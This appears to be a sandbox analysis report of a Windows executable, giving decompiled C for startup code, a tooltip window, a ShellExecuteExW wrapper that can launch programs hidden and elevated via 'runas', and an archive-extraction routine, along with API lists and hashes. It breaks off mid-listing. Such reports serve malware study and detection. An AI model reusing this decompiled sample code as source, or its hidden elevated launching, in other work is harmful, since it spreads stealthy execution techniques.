				E004189F6(_t27);
				_push(0x41e068);
				_push(0x41e064);
				L004189F0();
				_t29 =  *0x420a74; // 0x0
				_v112 = _t29;
				_t6 =  &_v116; // 0x41e068
				__getmainargs( &_v100, _t6,  &_v104,  *0x420a70,  &_v112);
				_push(0x41e060);
				_push(0x41e000); // executed
				L004189F0(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00406CBA(_t47);
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004189EA();
				return _t41;
			}

0x00418882
0x00418884
0x00418889
0x00418894
0x00418895
0x004188a2
0x004188a7
0x004188ac
0x004188b3
0x004188ba
0x004188c1
0x004188c7
0x004188cd
0x004188cf
0x004188d5
0x004188db
0x004188e4
0x004188e9
0x004188ee
0x004188f4
0x004188fb
0x00418901
0x00418901
0x00418902
0x00418907
0x0041890c
0x00418911
0x00418916
0x0041891b
0x0041892c
0x00418934
0x0041893a
0x0041893f
0x00418944
0x00418951
0x00418953
0x00418959
0x00418995
0x0041899a
0x0041899b
0x0041899b
0x0041895b
0x0041895b
0x0041895b
0x0041895c
0x0041895f
0x00418961
0x0041896c
0x0041896e
0x0041896e
0x0041896f
0x0041896f
0x0041896c
0x00418972
0x00418976
0x00000000
0x00000000
0x0041897c
0x00418983
0x0041898d
0x004189a2
0x0041898f
0x0041898f
0x0041898f
0x004189a3
0x004189a4
0x004189a5
0x004189ad
0x004189ae
0x004189b3
0x004189b7
0x004189bd
0x004189c2
0x004189c4
0x004189c7
0x004189c8
0x004189c9
0x004189d0

APIs

__set_app_type.MSVCRT ref: 004188AC
__p__fmode.MSVCRT ref: 004188C1
__p__commode.MSVCRT ref: 004188CF
__setusermatherr.MSVCRT ref: 004188FB
_initterm.MSVCRT ref: 00418911
__getmainargs.MSVCRT ref: 00418934
_initterm.MSVCRT ref: 00418944
GetStartupInfoA.KERNEL32(?), ref: 00418983
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004189A7
exit.KERNELBASE ref: 004189B7
_XcptFilter.MSVCRT ref: 004189C9

Strings

hA, xrefs: 0041892C, 0041892F

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: hA
API String ID: 801014965-2144240161
Opcode ID: da05986363848b39535c01f38044c81353f5938db63c8c80b970e5eda95b01cd
Instruction ID: 5163810e40c243ea8a830c876f5196bcbbc73427bd107f054e282432b9942568
Opcode Fuzzy Hash: da05986363848b39535c01f38044c81353f5938db63c8c80b970e5eda95b01cd
Instruction Fuzzy Hash: 0A418DB1D50348AFDB219FA5DC45AEA7BB8FB09710F60452FF841973A1CB784881CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402107, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402107(void* __edx) {
				struct tagRECT _v20;
				struct tagMSG _v48;
				struct HWND__* _t9;
				int _t21;
				int _t27;
				void* _t28;
				struct HWND__* _t29;

				_t28 = __edx;
				_t9 = CreateWindowExW(0x80, L"tooltips_class32", 0x41a650, 0, 0, 0, 0, 0, 0, 0, GetModuleHandleW(0), 0); // executed
				_t29 = _t9;
				GetWindowRect(GetDesktopWindow(),  &_v20);
				asm("cdq");
				asm("cdq");
				_t21 = SetWindowPos(_t29, 0, _v20.right - _v20.left - _t28 >> 1, _v20.bottom - _v20.top - _t28 >> 1, 0, 0, 4);
				if(_t29 != 0) {
					SetTimer(_t29, 1, 1, 0); // executed
					GetMessageW( &_v48, 0, 0, 0);
					DispatchMessageW( &_v48);
					_t27 = KillTimer(_t29, 1);
					 *0x41e6e0 = _t29;
					return _t27;
				}
				return _t21;
			}

0x00402107
0x00402130
0x00402136
0x00402143
0x00402151
0x0040215f
0x00402167
0x0040216f
0x00402177
0x00402184
0x0040218e
0x00402197
0x0040219d
0x00000000
0x0040219d
0x004021a6

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,004053C6,?,00000000), ref: 00402113
CreateWindowExW.USER32 ref: 00402130
GetDesktopWindow.USER32 ref: 0040213C
GetWindowRect.USER32 ref: 00402143
SetWindowPos.USER32(00000000,00000000,?,004053C6,00000000,00000000,00000004), ref: 00402167
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402177
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402184
DispatchMessageW.USER32 ref: 0040218E
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,004053C6,?,00000000), ref: 00402197

Strings

tooltips_class32, xrefs: 00402126

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageTimer$CreateDesktopDispatchHandleKillModuleRect
String ID: tooltips_class32
API String ID: 3184818434-1918224756
Opcode ID: 04ca2686028929ffb605c73bedea06de86d5631574423070629cb588f5067b6c
Instruction ID: 30cec1afabb704e9fa17e82a8dd3d8147b880bccc79ad9119920ceb82848ad91
Opcode Fuzzy Hash: 04ca2686028929ffb605c73bedea06de86d5631574423070629cb588f5067b6c
Instruction Fuzzy Hash: B9115E72602124BFC7109BB9AC4DEEF3F6DEF45761F048161F605E2180C67491108AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404A70, Relevance: 15.1, APIs: 10, Instructions: 82
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00404A70(void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				char _v28;
				struct _SHELLEXECUTEINFOW _v88;
				void* __ebx;
				void* _t38;
				struct HWND__* _t44;
				int _t53;
				int _t54;
				int _t66;

				E00410F2D(E00410F2D(_t38,  &_v16),  &_v28);
				_t66 = 0;
				memset( &_v88, 0, 0x3c);
				_v88.cbSize = 0x3c;
				_v88.lpDirectory = _a12;
				_v88.fMask = 0x740;
				_v88.nShow = 1;
				if((_a8 & 1) != 0) {
					_v88.nShow = 0;
					_v88.fMask = 0x8740;
				}
				if((_a8 & 0x00000002) != 0) {
					_v88.lpVerb = L"runas";
				}
				_t44 =  *0x41e6e0; // 0xb0068
				_v88.hwnd = _t44;
				ShowWindow(_t44, 5); // executed
				BringWindowToTop(_v88.hwnd); // executed
				E00411391(1,  &_v28, E004042CA(_a4,  &_v16));
				if(_v12 != _t66) {
					_v88.lpFile = _v16;
					_v88.lpParameters = _v28;
					_t53 = ShellExecuteExW( &_v88); // executed
					if(_t53 != 0) {
						if((_a8 & 0x00010000) == 0) {
							WaitForSingleObject(_v88.hProcess, 0xffffffff);
						}
						CloseHandle(_v88.hProcess);
						_t66 = 1;
					}
					_push(_v28);
					L00418674();
					_push(_v16);
					L00418674();
					_t54 = _t66;
				} else {
					_push(_v28);
					L00418674();
					_push(_v16);
					L00418674();
					_t54 = 1;
				}
				return _t54;
			}

0x00404a83
0x00404a8a
0x00404a91
0x00404a9f
0x00404aa6
0x00404aa9
0x00404ab0
0x00404ab6
0x00404ab8
0x00404abb
0x00404abb
0x00404ac6
0x00404ac8
0x00404ac8
0x00404acf
0x00404ad7
0x00404ada
0x00404ae3
0x00404afb
0x00404b03
0x00404b1c
0x00404b22
0x00404b29
0x00404b31
0x00404b3a
0x00404b41
0x00404b41
0x00404b4a
0x00404b50
0x00404b50
0x00404b52
0x00404b55
0x00404b5a
0x00404b5d
0x00404b62
0x00404b05
0x00404b05
0x00404b08
0x00404b0d
0x00404b10
0x00404b15
0x00404b15
0x00404b69

APIs

Part of subcall function 00410F2D: ??2@YAPAXI@Z.MSVCRT ref: 00410F35

memset.MSVCRT ref: 00404A91
ShowWindow.USER32(000B0068,00000005,?,00000000,?), ref: 00404ADA
KiUserCallbackDispatcher.NTDLL(?), ref: 00404AE3
??3@YAXPAX@Z.MSVCRT ref: 00404B08
??3@YAXPAX@Z.MSVCRT ref: 00404B10
ShellExecuteExW.SHELL32(0000003C), ref: 00404B29
WaitForSingleObject.KERNEL32(004069A8,000000FF,?,00000000,?), ref: 00404B41
CloseHandle.KERNEL32(004069A8,?,00000000,?), ref: 00404B4A
??3@YAXPAX@Z.MSVCRT ref: 00404B55
??3@YAXPAX@Z.MSVCRT ref: 00404B5D

Memory Dump Source

Source File: 00000012.00000002.486783550.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.486778513.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486797665.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486804379.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.486811234.0000000000423000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.486816562.0000000000434000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@CallbackCloseDispatcherExecuteHandleObjectShellShowSingleUserWaitWindowmemset
String ID:
API String ID: 472414731-0
Opcode ID: 5ddf2978bab7b2467ecd1bbf1ba7266b86edd4774756a4965460ffc5e47af818
Instruction ID: 1310b42ae67f022732f4864654f83fab3b2cbc2cff74903614aba321a63be556
Opcode Fuzzy Hash: 5ddf2978bab7b2467ecd1bbf1ba7266b86edd4774756a4965460ffc5e47af818
Instruction Fuzzy Hash: F0314FB1D00209AFDF01DFE5DC49ADEBBB4EF44314F10812AF611A62A0DB799985CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004142A3, Relevance: 11.0, APIs: 7, Instructions: 497
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004142A3() {
				void* __esi;
				signed int _t244;
				signed int _t248;
				signed int _t253;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t289;
				intOrPtr _t296;
				signed int _t298;
				signed int _t299;
				signed int _t304;
				signed int _t306;
				signed int _t307;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t331;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t376;
				intOrPtr _t398;
				signed int _t404;
				signed int _t416;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t436;
				void* _t437;
				signed int _t439;
				signed int _t443;
				intOrPtr* _t445;
				void* _t447;

				L0041870C();
				 *((intOrPtr*)(_t445 - 0x10)) = _t447 - 0xfffffffffffffff0;
				 *(_t445 - 4) = 0;
				_t428 =  *(_t445 + 0x7c);
				_t341 = _t428;
				 *(_t445 + 0x60) = _t341;
				if(_t428 != 0) {
					 *((intOrPtr*)( *_t428 + 4))(_t428);
				}
				 *((intOrPtr*)(_t445 + 0x24)) = 0;
				 *((intOrPtr*)(_t445 + 0x28)) = 0;
				 *(_t445 + 0x7f) =  *((intOrPtr*)(_t445 + 0x74)) == 0xffffffff;
				_t443 =  *(_t445 + 0x6c);
				if( *(_t445 + 0x7f) != 0) {
					 *((intOrPtr*)(_t445 + 0x74)) =  *((intOrPtr*)(_t443 + 0x6c));
				}
				if( *((intOrPtr*)(_t445 + 0x74)) != 0) {
					 *(_t445 + 0x1c) =  *(_t445 + 0x1c) | 0xffffffff;
					 *(_t445 + 0x18) = 0;
					_t429 = 0;
					__eflags = 0;
					while(1) {
						 *(_t445 + 0xc) = _t429;
						__eflags = _t429 -  *((intOrPtr*)(_t445 + 0x74));
						if(_t429 >=  *((intOrPtr*)(_t445 + 0x74))) {
							break;
						}
						__eflags =  *(_t445 + 0x7f);
						if( *(_t445 + 0x7f) == 0) {
							_t426 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t429 * 4);
						} else {
							_t426 = _t429;
						}
						_t331 =  *( *((intOrPtr*)(_t443 + 0x12c)) + _t426 * 4);
						 *(_t445 + 0x6c) = _t331;
						__eflags = _t331 - 0xffffffff;
						if(_t331 == 0xffffffff) {
							L21:
							_t429 = _t429 + 1;
							continue;
						} else {
							__eflags = _t331 -  *(_t445 + 0x1c);
							if(_t331 !=  *(_t445 + 0x1c)) {
								L16:
								_t416 =  *( *((intOrPtr*)(_t443 + 0x128)) + _t331 * 4);
								 *(_t445 + 0x18) = _t416;
								L17:
								 *(_t445 + 0x38) = _t416;
								while(1) {
									__eflags =  *(_t445 + 0x38) - _t426;
									if( *(_t445 + 0x38) > _t426) {
										break;
									}
									 *((intOrPtr*)(_t445 + 0x24)) =  *((intOrPtr*)(_t445 + 0x24)) +  *((intOrPtr*)( *(_t445 + 0x38) * 0x18 +  *((intOrPtr*)(_t443 + 0x68))));
									asm("adc [ebp+0x28], eax");
									 *(_t445 + 0x38) =  *(_t445 + 0x38) + 1;
									_t341 =  *(_t445 + 0x60);
									_t331 =  *(_t445 + 0x6c);
								}
								_t416 = _t426 + 1;
								 *(_t445 + 0x18) = _t416;
								 *(_t445 + 0x1c) = _t331;
								_t429 =  *(_t445 + 0xc);
								goto L21;
							}
							__eflags = _t426 - _t416;
							if(_t426 >= _t416) {
								goto L17;
							}
							goto L16;
						}
					}
					_t244 =  *((intOrPtr*)( *_t341 + 0xc))(_t341,  *((intOrPtr*)(_t445 + 0x24)),  *((intOrPtr*)(_t445 + 0x28)));
					__eflags = _t244;
					if(_t244 == 0) {
						_push(0x38);
						L00418686();
						__eflags = _t244;
						if(_t244 == 0) {
							_t342 = 0;
							__eflags = 0;
						} else {
							_t342 = E0041284F(_t244);
						}
						 *(_t445 + 0x2c) = _t342;
						 *(_t445 + 0x54) = _t342;
						__eflags = _t342;
						if(_t342 != 0) {
							 *((intOrPtr*)( *_t342 + 4))(_t342);
						}
						_t431 =  *(_t445 + 0x60);
						E00412775(_t342, _t431);
						E00413547(_t445 - 0x7c, __eflags, 1);
						 *(_t445 + 0x5c) =  *(_t445 + 0x5c) & 0x00000000;
						_t248 =  *((intOrPtr*)( *_t431))(_t431, 0x41a500, _t445 + 0x5c, 0);
						_push(0x38);
						L00418686();
						__eflags = _t248;
						if(_t248 == 0) {
							_t248 = 0;
							__eflags = 0;
						} else {
							 *_t248 = 0x41c098;
							 *((intOrPtr*)(_t248 + 4)) = 0;
							 *_t248 = 0x41c5a4;
							 *((intOrPtr*)(_t248 + 8)) = 0;
							 *((short*)(_t248 + 0xc)) = 0x100;
							 *((intOrPtr*)(_t248 + 0x30)) = 0;
						}
						_t432 = _t248;
						 *(_t445 + 0x3c) = _t432;
						 *(_t445 + 0x50) = _t432;
						__eflags = _t432;
						if(_t432 != 0) {
							 *((intOrPtr*)( *_t432 + 4))(_t432);
						}
						 *((intOrPtr*)(_t432 + 0x2c)) = _t443 + 0x10;
						_t73 = _t432 + 0x30; // 0x30
						E00408F80(_t73,  *(_t445 + 0x60));
						__eflags =  *(_t445 + 0x78);
						 *((char*)(_t432 + 0xc)) = 0 |  *(_t445 + 0x78) != 0x00000000;
						__eflags =  *(_t443 + 0x158);
						_t80 =  *(_t443 + 0x158) != 0;
						__eflags = _t80;
						 *((char*)(_t432 + 0xd)) = 0 | _t80;
						 *(_t445 + 0x44) = 0;
						while(1) {
							_t433 =  *(_t445 + 0x50);
							_t343 = E0041276A(_t342);
							__eflags = _t343;
							if(_t343 != 0) {
								break;
							}
							_t253 =  *(_t445 + 0x44);
							__eflags = _t253 -  *((intOrPtr*)(_t445 + 0x74));
							if(_t253 <  *((intOrPtr*)(_t445 + 0x74))) {
								 *((intOrPtr*)(_t445 + 0x30)) = 0;
								 *((intOrPtr*)(_t445 + 0x34)) = 0;
								 *((intOrPtr*)(_t445 + 0x10)) = 0;
								 *((intOrPtr*)(_t445 + 0x14)) = 0;
								__eflags =  *(_t445 + 0x7f);
								if( *(_t445 + 0x7f) == 0) {
									_t434 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t253 * 4);
								} else {
									_t434 = _t253;
								}
								_t344 =  *( *((intOrPtr*)(_t443 + 0x12c)) + _t434 * 4);
								 *(_t445 - 0x14) = _t344;
								 *(_t445 + 0x40) = 1;
								__eflags = _t344 - 0xffffffff;
								if(_t344 == 0xffffffff) {
									L70:
									asm("sbb ecx, ecx");
									_t257 = E0041427E( *(_t445 + 0x3c), _t434,  !( ~( *(_t445 + 0x7f) & 0x000000ff)) &  *((intOrPtr*)(_t445 + 0x70)) +  *(_t445 + 0x44) * 0x00000004,  *(_t445 + 0x40));
									 *(_t445 + 0x44) =  *(_t445 + 0x44) +  *(_t445 + 0x40);
									__eflags = _t257;
									if(_t257 == 0) {
										_t259 =  *(_t445 + 0x3c);
										__eflags =  *(_t259 + 0x24);
										if( *(_t259 + 0x24) == 0) {
											L109:
											_t260 =  *(_t445 + 0x2c);
											 *((intOrPtr*)(_t260 + 0x28)) =  *((intOrPtr*)(_t260 + 0x28)) +  *((intOrPtr*)(_t445 + 0x30));
											asm("adc [eax+0x2c], ecx");
											 *((intOrPtr*)(_t260 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) +  *((intOrPtr*)(_t445 + 0x10));
											asm("adc [eax+0x24], ecx");
											_t342 = _t260;
											continue;
										}
										 *(_t445 + 0x58) =  *(_t445 + 0x58) & 0x00000000;
										_t261 =  *(_t445 + 0x60);
										__eflags = _t261;
										if(_t261 != 0) {
											_t261 =  *((intOrPtr*)( *_t261))(_t261, 0x41a530, _t445 + 0x58);
										}
										 *(_t445 - 4) = 1;
										 *((char*)(_t445 + 0x7b)) = 0;
										 *((char*)(_t445 + 0x6f)) = 0;
										E00410F2D(_t261, _t445);
										_t436 = E00413764(_t445 - 0x7c, _t445 + 0x30, _t443, __eflags,  *((intOrPtr*)(_t443 + 0xc)),  *((intOrPtr*)(_t443 + 0x108)),  *((intOrPtr*)(_t443 + 0x10c)), _t443 + 0x10, _t344, _t445 + 0x30,  *(_t445 + 0x50),  *(_t445 + 0x54), 0,  *(_t445 + 0x58), _t445 + 0x7b, _t445 + 0x6f, _t445);
										__eflags = _t436 - 1;
										if(_t436 == 1) {
											L87:
											_t376 =  *(_t445 + 0x3c);
											__eflags =  *(_t376 + 0x24);
											 *((char*)(_t445 + 0x4f)) =  *(_t376 + 0x24) == 0;
											__eflags = _t436 - 1;
											_t209 = (0 | _t436 == 0x00000001) + 1; // 0x1
											_t437 = _t209;
											_t267 = E0041420C(_t376, _t437);
											 *(_t445 + 0x40) = _t267;
											__eflags = _t267;
											if(_t267 == 0) {
												__eflags =  *((char*)(_t445 + 0x4f));
												if( *((char*)(_t445 + 0x4f)) == 0) {
													L105:
													_push( *_t445);
													L00418674();
													_t268 =  *(_t445 + 0x58);
													goto L106;
												}
												_t270 =  *(_t445 + 0x5c);
												__eflags = _t270;
												if(_t270 == 0) {
													goto L105;
												}
												_t436 =  *((intOrPtr*)( *_t270 + 0x14))(_t270, 2, _t344, _t437);
												__eflags = _t436;
												if(_t436 == 0) {
													goto L105;
												}
												goto L102;
											}
											_push( *_t445);
											L00418674();
											_t284 =  *(_t445 + 0x58);
											__eflags = _t284;
											if(_t284 != 0) {
												 *((intOrPtr*)( *_t284 + 8))(_t284);
											}
											_t285 =  *(_t445 + 0x50);
											__eflags = _t285;
											if(_t285 != 0) {
												 *((intOrPtr*)( *_t285 + 8))(_t285);
											}
											_t286 =  *(_t445 + 0x5c);
											__eflags = _t286;
											if(_t286 != 0) {
												 *((intOrPtr*)( *_t286 + 8))(_t286);
											}
											E0041423B(_t445 - 0x7c);
											_t288 =  *(_t445 + 0x54);
											__eflags = _t288;
											if(_t288 != 0) {
												 *((intOrPtr*)( *_t288 + 8))(_t288);
											}
											_t289 =  *(_t445 + 0x60);
											__eflags = _t289;
											if(_t289 != 0) {
												 *((intOrPtr*)( *_t289 + 8))(_t289);
											}
											_t278 =  *(_t445 + 0x40);
											goto L110;
										} else {
											__eflags = _t436 - 0x80004001;
											if(_t436 == 0x80004001) {
												goto L87;
											}
											__eflags = _t436;
											if(_t436 != 0) {
												L102:
												_push( *_t445);
												L00418674();
												_t272 =  *(_t445 + 0x58);
												L103:
												__eflags = _t272;
												if(_t272 != 0) {
													 *((intOrPtr*)( *_t272 + 8))(_t272);
												}
												goto L71;
											}
											_t436 = E0041420C( *(_t445 + 0x3c), 2);
											_push( *_t445);
											L00418674();
											_t268 =  *(_t445 + 0x58);
											__eflags = _t436;
											if(_t436 == 0) {
												L106:
												__eflags = _t268;
												if(_t268 != 0) {
													 *((intOrPtr*)( *_t268 + 8))(_t268);
												}
												_t230 = _t445 - 4;
												 *_t230 =  *(_t445 - 4) & 0x00000000;
												__eflags =  *_t230;
												goto L109;
											}
											goto L103;
										}
									}
									L71:
									_t273 =  *(_t445 + 0x50);
									__eflags = _t273;
									if(_t273 != 0) {
										 *((intOrPtr*)( *_t273 + 8))(_t273);
									}
									_t274 =  *(_t445 + 0x5c);
									__eflags = _t274;
									if(_t274 != 0) {
										 *((intOrPtr*)( *_t274 + 8))(_t274);
									}
									E0041423B(_t445 - 0x7c);
									_t276 =  *(_t445 + 0x54);
									__eflags = _t276;
									if(_t276 != 0) {
										 *((intOrPtr*)( *_t276 + 8))(_t276);
									}
									_t277 =  *(_t445 + 0x60);
									__eflags = _t277;
									if(_t277 != 0) {
										 *((intOrPtr*)( *_t277 + 8))(_t277);
									}
									L24:
									_t278 = _t436;
									goto L110;
								} else {
									_t296 =  *((intOrPtr*)(_t443 + 0x18));
									_t398 =  *((intOrPtr*)(_t443 + 0x40));
									_t423 =  *(_t398 + 4 + _t344 * 4);
									 *((intOrPtr*)(_t445 + 0x10)) =  *((intOrPtr*)(_t296 + _t423 * 8)) -  *((intOrPtr*)(_t296 +  *(_t398 + _t344 * 4) * 8));
									asm("sbb edx, [eax+ecx*8+0x4]");
									 *((intOrPtr*)(_t445 + 0x14)) =  *((intOrPtr*)(_t296 + 4 + _t423 * 8));
									_t439 = _t434 + 1;
									__eflags = _t439;
									 *(_t445 + 0x20) = _t439;
									_t344 =  *(_t445 - 0x14);
									_t434 =  *( *((intOrPtr*)(_t443 + 0x128)) + _t344 * 4);
									_t298 =  *(_t445 + 0x44);
									while(1) {
										_t298 = _t298 + 1;
										 *(_t445 + 0x48) = _t298;
										__eflags = _t298 -  *((intOrPtr*)(_t445 + 0x74));
										if(_t298 >=  *((intOrPtr*)(_t445 + 0x74))) {
											break;
										}
										__eflags =  *(_t445 + 0x7f);
										if( *(_t445 + 0x7f) == 0) {
											_t404 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t298 * 4);
										} else {
											_t404 = _t298;
										}
										_t425 =  *((intOrPtr*)(_t443 + 0x12c));
										__eflags =  *((intOrPtr*)(_t425 + _t404 * 4)) - _t344;
										if( *((intOrPtr*)(_t425 + _t404 * 4)) != _t344) {
											break;
										} else {
											__eflags = _t404 -  *(_t445 + 0x20);
											if(_t404 <  *(_t445 + 0x20)) {
												break;
											}
											 *(_t445 + 0x20) = _t404 + 1;
											continue;
										}
									}
									_t299 = _t298 -  *(_t445 + 0x44);
									__eflags = _t299;
									 *(_t445 + 0x40) = _t299;
									 *(_t445 + 0x48) = _t434;
									while(1) {
										__eflags =  *(_t445 + 0x48) -  *(_t445 + 0x20);
										if( *(_t445 + 0x48) >=  *(_t445 + 0x20)) {
											goto L70;
										}
										 *((intOrPtr*)(_t445 + 0x30)) =  *((intOrPtr*)(_t445 + 0x30)) +  *((intOrPtr*)( *(_t445 + 0x48) * 0x18 +  *((intOrPtr*)(_t443 + 0x68))));
										asm("adc [ebp+0x34], eax");
										 *(_t445 + 0x48) =  *(_t445 + 0x48) + 1;
									}
									goto L70;
								}
							}
							__eflags = _t433;
							if(_t433 != 0) {
								 *((intOrPtr*)( *_t433 + 8))(_t433);
							}
							_t304 =  *(_t445 + 0x5c);
							__eflags = _t304;
							if(_t304 != 0) {
								 *((intOrPtr*)( *_t304 + 8))(_t304);
							}
							E0041423B(_t445 - 0x7c);
							_t306 =  *(_t445 + 0x54);
							__eflags = _t306;
							if(_t306 != 0) {
								 *((intOrPtr*)( *_t306 + 8))(_t306);
							}
							_t307 =  *(_t445 + 0x60);
							__eflags = _t307;
							if(_t307 != 0) {
								 *((intOrPtr*)( *_t307 + 8))(_t307);
							}
							goto L7;
						}
						__eflags = _t433;
						if(_t433 != 0) {
							 *((intOrPtr*)( *_t433 + 8))(_t433);
						}
						_t313 =  *(_t445 + 0x5c);
						__eflags = _t313;
						if(_t313 != 0) {
							 *((intOrPtr*)( *_t313 + 8))(_t313);
						}
						E0041423B(_t445 - 0x7c);
						_t315 =  *(_t445 + 0x54);
						__eflags = _t315;
						if(_t315 != 0) {
							 *((intOrPtr*)( *_t315 + 8))(_t315);
						}
						_t316 =  *(_t445 + 0x60);
						__eflags = _t316;
						if(_t316 != 0) {
							 *((intOrPtr*)( *_t316 + 8))(_t316);
						}
						_t278 = _t343;
						goto L110;
					}
					 *((intOrPtr*)( *_t341 + 8))(_t341);
					goto L24;
				} else {
					if(_t428 != 0) {
						 *((intOrPtr*)( *_t428 + 8))(_t428);
					}
					L7:
					_t278 = 0;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t445 - 0xc));
					return _t278;
				}
			}

0x004142ac
0x004142b7
0x004142bc
0x004142bf
0x004142c2
0x004142c4
0x004142c9
0x004142ce
0x004142ce
0x004142d1
0x004142d4
0x004142db
0x004142df
0x004142e6
0x004142eb
0x004142eb
0x004142f3
0x00414306
0x0041430a
0x0041430d
0x0041430d
0x0041430f
0x0041430f
0x00414312
0x00414315
0x00000000
0x00000000
0x00414317
0x0041431b
0x00414324
0x0041431d
0x0041431d
0x0041431d
0x0041432d
0x00414330
0x00414333
0x00414336
0x00414382
0x00414382
0x00000000
0x00414338
0x00414338
0x0041433b
0x00414341
0x00414347
0x0041434a
0x0041434d
0x0041434d
0x00414350
0x00414350
0x00414353
0x00000000
0x00000000
0x00414361
0x00414368
0x0041436b
0x0041436e
0x00414371
0x00414371
0x00414376
0x00414379
0x0041437c
0x0041437f
0x00000000
0x0041437f
0x0041433d
0x0041433f
0x00000000
0x00000000
0x00000000
0x0041433f
0x00414336
0x0041438e
0x00414393
0x00414395
0x004143a4
0x004143a6
0x004143ac
0x004143ae
0x004143bb
0x004143bb
0x004143b0
0x004143b7
0x004143b7
0x004143bd
0x004143c0
0x004143c3
0x004143c5
0x004143ca
0x004143ca
0x004143cf
0x004143d5
0x004143df
0x004143e4
0x004143f4
0x004143f6
0x004143f8
0x00414400
0x00414402
0x00414421
0x00414421
0x00414404
0x00414404
0x0041440a
0x0041440d
0x00414413
0x00414416
0x0041441c
0x0041441c
0x00414423
0x00414425
0x00414428
0x0041442b
0x0041442d
0x00414432
0x00414432
0x00414438
0x0041443e
0x00414441
0x0041444a
0x00414450
0x00414455
0x0041445b
0x0041445b
0x0041445e
0x00414461
0x00414464
0x00414464
0x0041446e
0x00414470
0x00414472
0x00000000
0x00000000
0x004144b4
0x004144b7
0x004144ba
0x00414500
0x00414503
0x00414506
0x00414509
0x0041450c
0x0041450f
0x00414518
0x00414511
0x00414511
0x00414511
0x00414521
0x00414524
0x00414527
0x0041452e
0x00414531
0x004145c9
0x004145db
0x004145e6
0x004145f0
0x004145f3
0x004145f5
0x0041463c
0x0041463f
0x00414643
0x004147bd
0x004147c0
0x004147c3
0x004147c9
0x004147cf
0x004147d5
0x004147d8
0x00000000
0x004147d8
0x00414649
0x0041464d
0x00414650
0x00414652
0x00414660
0x00414660
0x00414662
0x00414666
0x0041466a
0x00414671
0x004146ae
0x004146b0
0x004146b3
0x004146ea
0x004146ea
0x004146ed
0x004146f1
0x004146f7
0x004146fd
0x004146fd
0x00414701
0x00414706
0x00414709
0x0041470b
0x00414767
0x0041476b
0x004147a3
0x004147a3
0x004147a6
0x004147ac
0x00000000
0x004147ac
0x0041476d
0x00414770
0x00414772
0x00000000
0x00000000
0x0041477e
0x00414780
0x00414782
0x00000000
